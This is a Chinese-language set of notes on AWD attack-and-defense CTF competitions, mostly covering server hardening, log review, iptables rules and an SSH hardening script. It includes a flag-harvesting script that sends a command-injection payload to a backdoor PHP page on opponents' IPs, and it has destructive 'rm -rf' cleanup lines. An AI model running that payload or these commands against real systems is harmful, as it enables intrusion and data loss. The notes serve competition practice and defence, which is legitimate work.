Awd Note
线下攻防赛笔记。
从下面几个方面入手。
拿到服务器
先passwd命令修改用户密码,数据库密码,数据库中的网站账户密码
查看/etc/passwd下的后门用户,删除
备份/var/www/html/下的源码,d盾扫描后门
禁止修改文件夹内容chattr -R +i /var/www/html
看下最近的敏感操作
1cat /root/.bash_history
看下最近登录的账户 lastlog
1last -n 5|awk '{print $1}'
ps aux ps -ef查看诡异进程
查看已建立的网络连接及进程
1netstat -antulp | grep EST
批量杀进程
1kill `ps aux|grep 进程名|awk {'print $2'}`
查找24小时内修改的文件
1find ./ -mtime 0 -name "*.php"
ssh加固
/etc/ssh/sshd_config
修改ssh端口号
增加条目
1AllowUsers root
2AllowGroups root
3DenyUsers 看情况
4DenyGroups 看情况
1/etc/hosts.allow
2/etc/hosts.deny
3# cat hosts.allow
4sshd: 172.24.11. , 172.24.12. //sshd只允许这两个ip段链接
更改完需要重启ssh服务
MySQL加固
备份mysql数据库
1mysqldump -u 用户名 -p 密码 数据库名 > bak.sql
2mysqldump --all-databases > bak.sql
还原mysql数据库
1mysql -u 用户名 -p 密码 数据库名 < bak.sql
删除phpmyadmin
更改MySQL root密码
方法1: 用SET PASSWORD命令
1mysql -u root
2mysql> SET PASSWORD FOR ['root'@'localhost'](mailto:'root'@'localhost') = PASSWORD('newpass');
方法2:用mysqladmin
1mysqladmin -u root password "newpass"
如果root已经设置过密码,采用如下方法
1mysqladmin -u root password oldpass "newpass"
方法3: 用UPDATE直接编辑user表
1mysql -u root
2
3mysql> use mysql;
4
5mysql> UPDATE user SET Password = PASSWORD('newpass') WHERE user = 'root';
6
7mysql> FLUSH PRIVILEGES;
在没有root密码的时候,可以这样
1mysqld_safe --skip-grant-tables&
2
3mysql -u root mysql
4
5mysql> UPDATE user SET password=PASSWORD("new password") WHERE user='root';
6
7mysql> FLUSH PRIVILEGES;
日志
日志路径
1/var/log/auth.log
2/var/log/apache2/access.log
3/var/log/apache2/error.log
4/var/log/messages
5lastlog
6last
7lastb
8/var/log/maillog
9/var/log/secure
10find / -name nginx.conf nginx的配置文件中有日志目录
11access_log /var/log/nginx/access.log;
12error_log /var/log/nginx/error.log;
13tomcat的日志默认是存放在安装目录下的logs目录下
查看访问最多的前十个IP
1cat /var/log/apache2/access.log |cut -d ' ' -f1|sort|uniq -c|sort -r|head -n 10
查看访问最多的前十个url
1cat /var/log/apache2/access.log |cut -d ' ' -f7|sort|uniq -c|sort -r|head -n 10
文件监控
1git clone https://github.com/seb-m/pyinotify.git
2cd pyinotify/
3python setup.py install
启动监控
1python -m pyinotify /var/www/html/
网络监控
iptables操作
开放端口
1#开放ssh
2iptables -A INPUT -p tcp --dport 22 -j ACCEPT
3iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT
4#打开80端口iptables -A INPUT -p tcp --dport 80 -j ACCEPT
5iptables -A OUTPUT -p tcp --sport 80 -j ACCEPT
6#开启多端口简单用法
7iptables -A INPUT -p tcp -m multiport --dport 22,80,8080,8081 -j ACCEPT
8#允许外部访问本地多个端口 如8080,8081,8082,且只允许是新连接、已经连接的和已经连接的延伸出新连接的会话
9iptables -A INPUT -p tcp -m multiport --dport 8080,8081,8082,12345 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
10iptables -A OUTPUT -p tcp -m multiport --sport 8080,8081,8082,12345 -m state --state ESTABLISHED -j ACCEPT
限制IP和访问速率
1#单个IP的最大连接数为 30
2iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT
3#单个IP在60秒内只允许最多新建15个连接
4iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --update --seconds 60 --hitcount 15 -j REJECTiptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --set -j ACCEPT
5#允许外部访问本机80端口,且本机初始只允许有10个连接,每秒新增加2个连接,如果访问超过此限制则拒接 (此方式可以限制一些攻击)
6iptables -A INPUT -p tcp --dport 80 -m limit --limit 2/s --limit-burst 10 -j ACCEPTiptables -A OUTPUT -p tcp --sport 80 -j ACCEPT
放DDOS
1iptables -A INPUT -p tcp --dport 80 -m limit --limit 20/minute --limit-burst 100 -j ACCEPT
iptables-save 保存
批量提交flag
下面是在iscc2019下线awd中用到的脚本
1#!/usr/bin/env python
2# -*- coding: utf-8 -*-
3import requests
4
5
6def getflag(ip):
7 # 批量获取shell
8 url = "http://{}/8d20d57e2f2b9be5/fb30e70f7813489ddae79be07925a34a.php".format(ip)
9 print(url)
10
11 data = {
12 'a': 'a=1);system(getflag',
13 }
14 res = requests.post(url, data, ).content
15 print res[758:-1]
16 if 'flag' in res:
17 postflag(res[758:-1])
18
19
20def postflag(flag):
21 flag = flag.replace('\n','').replace('\t','').strip()
22 headers = {
23 'Cookie': 'MacaronSession=b54f71d79035ee55'
24 }
25 data = {
26 'flag': flag
27 }
28 print flag
29 r = requests.post('http://172.16.100.5:4000/sendconflictflag', data=data, headers=headers)
30 print(r.content)
31
32def getip():
33 with open('ip.txt', 'r') as f:
34 ips = [ip.strip('\n').replace('\t', '') for ip in f.readlines()]
35 for ip in ips:
36 # print(ip[0:3])
37 try:
38
39 if ip[0:3] == '119':
40 getflag(ip[1:])
41 # if ip[:3] == '192':
42 # getflag(ip[1:])
43 except:
44 continue
45
46if __name__ == '__main__':
47 # for ip in range(1, 255):
48 # getflag('192.168.{}.1'.format(ip))
49 # getflag('127.0.0.1')
50 getip()
其他的脚本
1#!/usr/bin/env python
2# -*- coding: utf-8 -*-
3# author:Y4er
4import logging
5import random
6import string
7import paramiko
8
9logger = logging.getLogger("Logger")
10logger.setLevel(logging.DEBUG)
11handler = logging.StreamHandler()
12formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y/%m/%d %H:%M:%S')
13handler.setFormatter(formatter)
14logger.addHandler(handler)
15
16
17def randomStr(size=16, chars=string.ascii_uppercase + string.digits):
18 return ''.join(random.choice(chars) for _ in range(size))
19
20
21def changeSSHPwd(host, username, newpasswd='root', port=22, timeout=5):
22 '''
23 更改ssh root密码并返回链接会话对象
24 :param host: ip地址
25 :param username: root
26 :param newpasswd: 新密码
27 :param port: 端口默认22
28 :param timeout: 连接超时5s
29 :return:
30 '''
31 try:
32 ssh = paramiko.SSHClient()
33 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
34 ssh.connect(host, port, username, newpasswd, timeout=timeout)
35 logger.info("{} 链接成功.".format(host))
36
37 stdin, stdout, stderr = ssh.exec_command('id')
38 logger.info("当前用户权限:%s" % stdout.read().strip('\n'))
39 stdin, stdout, stderr = ssh.exec_command('echo {}:{}|chpasswd {}'.format(username, newpasswd, username))
40 logger.warning('尝试更改{}密码为:{}.'.format(host, newpasswd))
41
42 except Exception as e:
43 logging.error("{} ssh connect fail.{}".format(host, e))
44 exit(0)
45 return ssh
46
47
48def check(session):
49 '''
50 显示一些基本信息
51 :param session: ssh会话
52 :param rootpass: 原root密码
53 :return:
54 '''
55 stdin, stdout, stderr = session.exec_command(
56 '''sudo cat /etc/passwd|grep -v nologin|awk -F ":" {'print $1"|"$3"|"$4"|"$6'}''')
57 logger.info("显示可疑用户\n" + stdout.read())
58
59 stdin, stdout, stderr = session.exec_command('''last -n 10|awk '{print $1}' ''')
60 logger.info("显示最近登录的10个用户\n" + stdout.read())
61
62 stdin, stdout, stderr = session.exec_command(
63 '''find / -iname "*upload*" |grep php ''')
64 logger.info("可疑上传文件的脚本\n" + stdout.read())
65
66 stdin, stdout, stderr = session.exec_command(
67 '''netstat -natlp |sed '1,2d'|awk -F " " {'print $4"|"$5"|"$6'} ''')
68 logger.info("所有开放的端口号\n本地主机|远程主机|状态\n" + stdout.read())
69
70 stdin, stdout, stderr = session.exec_command(
71 '''netstat -antulp | grep EST ''')
72 logger.info("查看已建立的网络连接及进程\n" + stdout.read())
73
74 stdin, stdout, stderr = session.exec_command(
75 '''find / -mtime 0 -name "*.php" ''')
76 logger.info("查找24小时内修改的文件\n" + stdout.read())
77
78
79def bak(session, rootpass, newrootpass='root'):
80 '''
81 备份文件
82 :param session:ssh会话
83 :return:
84 '''
85 session.exec_command(
86 '''sudo cp /etc/passwd /tmp/passwd && sudo cp /etc/shadow /tmp/shadow ''')
87 logger.info("备份passwd和shadow到/tmp/")
88
89 stdin, stdout, stderr = session.exec_command(
90 '''mkdir /tmp/www/ && cp -R /var/www/html/ /tmp/www/ ''')
91 logger.info("备份/var/www/html/到/tmp/www/")
92
93 session.exec_command(
94 '''mkdir /tmp/database/ && mysqldump -uroot -p{} --all-databases > /tmp/database/all.sql'''.format(rootpass))
95 logger.info("备份MySQL数据库到/tmp/database/all.sql")
96
97 session.exec_command('''find / -iname "phpinfo.php"|xargs rm -rf''')
98 logger.warning("删除phpinfo.php")
99
100 session.exec_command('''find / -type d -iname "*phpmyadmin*"|xargs rm -rf''')
101 logger.warning("删除phpmyadmin")
102
103 session.exec_command('''mysqladmin -u root -p{} password {}'''.format(rootpass, newrootpass))
104 logger.warning("修改MySQL root账户密码为{}".format(newrootpass))
105 session.exec_command('''service mysql restart''')
106
107
108def defend(session, ip):
109 '''
110 加固措施
111 :param session: ssh会话
112 :param ip: 你的ip或c段
113 :return:
114 '''
115 stdin, stdout, stderr = session.exec_command('''echo "sshd:{}" >> /etc/hosts.allow '''.format('ip'))
116 logger.warning("添加{}到/etc/hosts.allow".format(ip))
117 stdin, stdout, stderr = session.exec_command('''service ssh restart''')
118
119 stdin, stdout, stderr = session.exec_command(
120 '''mkdir -R /bin/zzrvtc/ && mv /bin/curl /bin/zzrvtc/curl && mv /bin/wget /bin/zzrvtc/wget && mv /bin/ls /bin/zzrvtc/ls && mv /bin/cd /bin/zzrvtc/cd&&mv /bin/ll /bin/zzrvtc/ll''')
121 logger.warning("移动curl wget cd ls ll命令到/bin/zzrvtc/下 {}".format(stdout.read()))
122
123
124if __name__ == '__main__':
125 # 更改ssh密码为root
126 session = changeSSHPwd('192.168.24.128', 'root', 'root')
127 # check
128 check(session)
129 # 更改mysql密码为root
130 bak(session, 'root')
131 # 防御策略
132 defend(session,'192.168.24.128/24')
1批量给php文件引用waf.php
2find . -type f -name "*.php"|xargs sed -i "s/<?php/<?php\nrequire_once('\/tmp\/waf.php');\n/g"